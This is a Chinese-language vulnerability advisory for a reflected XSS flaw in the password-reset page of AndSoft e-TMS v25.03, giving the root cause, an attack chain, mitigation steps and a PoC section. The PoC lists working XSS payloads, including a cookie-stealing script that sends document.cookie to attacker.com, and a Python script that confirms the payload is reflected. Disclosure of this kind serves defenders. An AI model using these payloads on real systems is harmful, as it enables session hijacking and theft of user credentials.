CVE-2025-59747：AndSoft e-TMS v25.03 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59747

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59747是AndSoft公司开发的e-TMS（电子运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1评分为6.1分，属于中危级别。e-TMS是一款广泛应用于物流和运输管理领域的企业级软件，用于管理运输订单、车辆调度、货物跟踪等业务流程。由于该系统通常涉及企业内部敏感数据，包括客户信息、运输路线、定价策略等，因此其安全性至关重要。该漏洞的存在使得攻击者能够通过构造恶意URL，诱使受害者点击，从而在受害者的浏览器上下文中执行任意JavaScript代码。攻击者无需进行身份认证即可发起攻击，但需要用户交互（如点击恶意链接）才能触发漏洞利用。一旦成功利用，攻击者可以窃取用户的会话凭证、劫持用户会话、篡改页面内容、进行钓鱼攻击，甚至在某些情况下可以利用XSS作为进一步攻击的跳板，如窃取敏感数据或执行未授权操作。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明该漏洞通过网络进行攻击，具有低攻击复杂度，无需权限，但需要用户交互，并且由于涉及作用域变更（S:C），其影响范围可能扩大。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞，存在于AndSoft e-TMS v25.03的'/clt/resetPassword.asp'页面中。具体而言，应用程序在处理密码重置功能时，未对URL中的'l'参数进行充分的输入验证和输出编码，导致攻击者可以将恶意JavaScript代码注入到该参数中。当受害者点击包含恶意'l'参数的URL时，服务器会将该参数的值未经适当转义地反射回响应页面中，浏览器会将其解析并执行其中的JavaScript代码。

从技术层面分析，漏洞的根本原因在于：1）输入验证缺失——应用程序未对'l'参数的内容进行白名单或黑名单过滤，允许包含HTML/JavaScript特殊字符的输入通过；2）输出编码缺失——在将'l'参数的值嵌入到HTML响应中时，未使用适当的HTML实体编码（如将'<'编码为'<'，将'>'编码为'>'等），导致浏览器将恶意输入解释为可执行代码而非纯文本。

利用方式方面，攻击者首先需要构造一个包含恶意JavaScript代码的URL，例如在'l'参数中注入类似'<script>alert(document.cookie)</script>'或更复杂的payload（如窃取cookie并发送到攻击者控制的服务器的代码）。然后，攻击者通过社会工程学手段（如钓鱼邮件、即时消息等）将恶意URL发送给目标用户。当受害者点击该链接时，恶意脚本将在受害者的浏览器中执行，可能导致会话劫持、敏感信息泄露或进一步的恶意操作。

攻击链分析

STEP 1

步骤1：漏洞侦察

攻击者通过信息收集发现目标组织使用AndSoft e-TMS v25.03系统，并定位到存在漏洞的端点'/clt/resetPassword.asp'及易受攻击的参数'l'。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，将payload注入到'l'参数中，如窃取cookie、重定向到钓鱼页面或执行其他恶意操作的脚本。

STEP 3

步骤3：社工投递

攻击者通过钓鱼邮件、即时消息、社交媒体或其他欺骗手段，将恶意URL发送给目标用户，诱使其点击。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接后，浏览器向目标服务器发送请求，服务器将未经过滤的'l'参数值反射回响应页面中。

STEP 5

步骤5：恶意代码执行

浏览器解析响应内容并执行嵌入的恶意JavaScript代码，攻击者可以窃取会话凭证、劫持用户会话或执行其他恶意操作。

STEP 6

步骤6：权限提升与持久化

利用窃取的会话凭证，攻击者可以以受害者身份登录系统，获取敏感数据或进行进一步的横向移动和持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59747 - AndSoft e-TMS v25.03 Reflected XSS PoC -->
<!-- Vulnerable endpoint: /clt/resetPassword.asp -->
<!-- Vulnerable parameter: l -->

<!-- Method 1: Basic XSS payload via URL parameter -->
<!-- The attacker crafts a malicious URL and sends it to the victim -->
<!-- When the victim clicks the link, the JavaScript executes in their browser context -->

https://target-server/clt/resetPassword.asp?l=<script>alert('XSS-CVE-2025-59747')</script>

<!-- Method 2: Cookie stealing payload (for demonstration) -->
<!-- This payload would exfiltrate the victim's session cookie to attacker-controlled server -->

https://target-server/clt/resetPassword.asp?l=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- Method 3: Using event handler to bypass basic filters -->
https://target-server/clt/resetPassword.asp?l="><img src=x onerror=alert(document.domain)>

<!-- Method 4: Using SVG tag for XSS execution -->
https://target-server/clt/resetPassword.asp?l=<svg/onload=alert('XSS')>

<!-- Python exploit script example -->
#!/usr/bin/env python3
import requests

TARGET_URL = "https://target-server/clt/resetPassword.asp"
XSS_PAYLOAD = "<script>alert('CVE-2025-59747-XSS')</script>"

def exploit():
    params = {"l": XSS_PAYLOAD}
    response = requests.get(TARGET_URL, params=params, verify=False)
    if XSS_PAYLOAD in response.text:
        print("[+] XSS vulnerability confirmed!")
        print(f"[+] Payload reflected in response without sanitization")
        return True
    else:
        print("[-] Payload was sanitized or filtered")
        return False

if __name__ == "__main__":
    exploit()

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方修复补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）配置规则，阻止包含常见XSS payload特征的请求；2）在反向代理或负载均衡器层面，对'/clt/resetPassword.asp'端点的URL参数进行严格的输入过滤；3）对最终用户进行安全意识培训，告诫用户不要点击来源不明的链接，特别是涉及密码重置功能的链接；4）监控异常的网络流量和用户行为，及时发现潜在的攻击活动；5）考虑在受影响的系统前部署额外的安全控制措施，如双因素认证，以降低会话劫持的风险。